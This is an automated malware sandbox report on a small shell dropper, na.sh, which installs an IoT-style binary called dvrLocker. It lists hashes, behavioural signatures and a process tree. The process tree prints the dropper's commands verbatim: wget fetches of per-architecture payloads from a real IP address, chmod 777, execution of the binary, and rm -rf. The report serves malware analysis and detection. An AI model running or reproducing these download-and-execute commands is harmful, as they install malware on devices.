Analysis
max time kernel: 149s
max time network: 133s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 10-10-2024 07:02
Static task
static1
Behavioral task behavioral1: sample na.sh, resource ubuntu1804-amd64-20240508-en
Behavioral task behavioral2: sample na.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample na.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample na.sh, resource debian9-mipsel-20240418-en
General
Target: na.sh
Size: 372B
MD5: 6b2644c0adca68c54a53a79842eb3b3c
SHA1: d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
SHA256: 89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
SHA512: 943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 5 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process): 1511 chmod; 1518 chmod; 1522 chmod; 1526 chmod; 1530 chmod
Deletes itself (1 IoCs)
Processes (pid, process): 1531 dvrLocker
Executes dropped EXE (5 IoCs)
Processes (ioc, pid, process): /dvrLocker 1512 dvrLocker; /dvrLocker 1519 dvrLocker; /dvrLocker 1523 dvrLocker; /dvrLocker 1527 dvrLocker; /dvrLocker 1531 dvrLocker
Enumerates running processes
Discovers information about currently running processes on the system
Reads process memory (1 TTPs, 4 IoCs)
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
Processes (description, ioc, process): File opened for reading /proc/479/maps dvrLocker; File opened for reading /proc/679/maps dvrLocker; File opened for reading /proc/683/maps dvrLocker; File opened for reading /proc/708/maps dvrLocker
Changes its process name (1 IoCs)
Processes (description, pid, process): Changes the process name, possibly in an attempt to hide itself 1531 dvrLocker
Processes (description, ioc, process): File opened for reading, by dvrLocker, of each of the following: /proc/1502/cmdline, /proc/1515/cmdline, /proc/16/cmdline, /proc/1138/cmdline, /proc/1532/cmdline, /proc/15/cmdline, /proc/650/cmdline, /proc/3/cmdline, /proc/6/cmdline, /proc/12/cmdline, /proc/526/cmdline, /proc/557/cmdline, /proc/1036/cmdline, /proc/1086/cmdline, /proc/1258/cmdline, /proc/1533/cmdline, /proc/17/cmdline, /proc/84/cmdline, /proc/115/cmdline, /proc/676/cmdline, /proc/1290/cmdline, /proc/1477/cmdline, /proc/21/cmdline, /proc/203/cmdline, /proc/1121/cmdline, /proc/1317/cmdline, /proc/1352/cmdline, /proc/137/cmdline, /proc/785/cmdline, /proc/997/cmdline, /proc/1379/cmdline, /proc/28/cmdline, /proc/82/cmdline, /proc/484/cmdline, /proc/1049/cmdline, /proc/19/cmdline, /proc/20/cmdline, /proc/177/cmdline, /proc/26/cmdline, /proc/79/cmdline, /proc/175/cmdline, /proc/1011/cmdline, /proc/1175/cmdline, /proc/1240/cmdline, /proc/166/cmdline, /proc/663/cmdline, /proc/1053/cmdline, /proc/1056/cmdline, /proc/1135/cmdline, /proc/1503/cmdline, /proc/10/cmdline, /proc/78/cmdline, /proc/85/cmdline, /proc/89/cmdline, /proc/1272/cmdline, /proc/1176/cmdline, /proc/1177/cmdline, /proc/31/cmdline, /proc/164/cmdline, /proc/414/cmdline, /proc/1130/cmdline, /proc/1142/cmdline, /proc/1156/cmdline, /proc/1327/cmdline
System Network Configuration Discovery (1 TTPs, 1 IoCs)
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process): File opened for modification /tmp/0 na.sh
Processes
- /tmp/na.sh: "/tmp/na.sh" PID:1508
  signatures: Writes file to tmp directory
  - /bin/rm: "rm -rf dvrLocker" PID:1509
  - /usr/bin/wget: "wget http://185.157.247.125/c/empsl -O -" PID:1510
  - /bin/chmod: "chmod 777 dvrLocker" PID:1511
    signatures: File and Directory Permissions Modification
  - /dvrLocker: "./dvrLocker tplink.new" PID:1512
    signatures: Executes dropped EXE
  - /usr/bin/wget: "wget http://185.157.247.125/c/emips -O -" PID:1514
    signatures: System Network Configuration Discovery
  - /bin/chmod: "chmod 777 dvrLocker" PID:1518
    signatures: File and Directory Permissions Modification
  - /dvrLocker: "./dvrLocker tplink.new" PID:1519
    signatures: Executes dropped EXE
  - /usr/bin/wget: "wget http://185.157.247.125/c/earm -O -" PID:1521
  - /bin/chmod: "chmod 777 dvrLocker" PID:1522
    signatures: File and Directory Permissions Modification
  - /dvrLocker: "./dvrLocker tplink.new" PID:1523
    signatures: Executes dropped EXE
  - /usr/bin/wget: "wget http://185.157.247.125/c/earm7 -O -" PID:1525
  - /bin/chmod: "chmod 777 dvrLocker" PID:1526
    signatures: File and Directory Permissions Modification
  - /dvrLocker: "./dvrLocker tplink.new" PID:1527
    signatures: Executes dropped EXE
  - /usr/bin/wget: "wget http://185.157.247.125/c/ex86 -O -" PID:1529
  - /bin/chmod: "chmod 777 dvrLocker" PID:1530
    signatures: File and Directory Permissions Modification
  - /dvrLocker: "./dvrLocker tplink.new" PID:1531
    signatures: Deletes itself; Executes dropped EXE; Reads process memory; Changes its process name; Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 27KB
MD5: 300cd530fb0a7f7cf6db875f68c0483e
SHA1: a4bce294dc142fb1354e917bed4d58c98f381850
SHA256: a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512: 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

Filesize: 53KB
MD5: 521069251bdce0fbd37497b8f527ab23
SHA1: 020730190edde76dec3de9678351aa6e65ab91bf
SHA256: aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72
SHA512: 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70

Filesize: 29KB
MD5: dba2d4fa85301b473ce27c4f2e2a0297
SHA1: 30ec57316ef1bbe5840d997082a0b01003bf365f
SHA256: b07efeec1020b016192a2c53567fa55e056f3219b0f77edef00ca60e50ecb797
SHA512: b8fcabe3733b4d4d55b056d1cca76014839b3728b197aca440af4118e87602e3a6612ae4f24dd0c21fc43121dbe33cc798c3ad9006a4379dad250e4a2f5adc53

Filesize: 41KB
MD5: 3cfc76868e26201ac03e0583b7c8aaba
SHA1: 03436d9d090e1f944fecf60adc1e45f90df20c26
SHA256: 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA512: 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

Filesize: 40KB
MD5: c0b34d8a59f793b636b5424b8e96a64a
SHA1: d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256: defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA512: 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4